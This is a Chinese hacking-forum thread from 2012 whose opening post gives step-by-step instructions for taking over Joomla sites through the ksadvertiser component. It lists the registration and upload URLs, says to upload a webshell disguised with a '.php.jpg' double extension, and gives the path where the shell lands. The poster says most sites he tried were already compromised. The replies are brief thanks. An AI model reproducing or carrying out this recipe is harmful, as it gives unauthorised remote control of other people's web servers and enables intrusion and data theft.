找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
NB5牛论坛»首页 技术交流区 网安技术 Joomla 远程上传漏洞.直接getshell
返回列表 发新帖
查看: 846|回复: 2

Joomla 远程上传漏洞.直接getshell

[复制链接]
意念丶

7

主题

9

回帖

53

牛毛

初生牛犊

积分
53
发表于 2012-7-14 09:52:54 | 显示全部楼层 |阅读模式 来自 山东省济南市
1.  有些joomal需要先注册.
http://site/index.php?option=com_user&view=login
2.  到上传地址
http://site/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
3.  点击image后点击upload,选择shell, 将shell重名为adm1n.php.jpg格式.
4.  上传后的文件在 / images/ksadvertiser/U0 这个目录下.
http://site/images/ksadvertiser/U0/adm1n.php.gif
Demo:
我随便测试了一下, 基本都被搞了. 疯狂的人们啊, 这今天刚出的漏洞就成这样了… 1337V5啊.
回复

举报

梦随心辉

0

主题

29

回帖

150

牛毛

一级牛人

积分
150
发表于 2012-10-11 13:30:13 | 显示全部楼层 来自 山东省青岛市
学习一下拉
回复

举报

stefani

53

主题

524

回帖

1226

牛毛

二级牛人

积分
1226
发表于 2012-10-22 14:51:40 | 显示全部楼层 来自 湖北省武汉市
谢谢楼主分享。。。。。
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-25 12:54 , Processed in 0.197207 second(s), 43 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表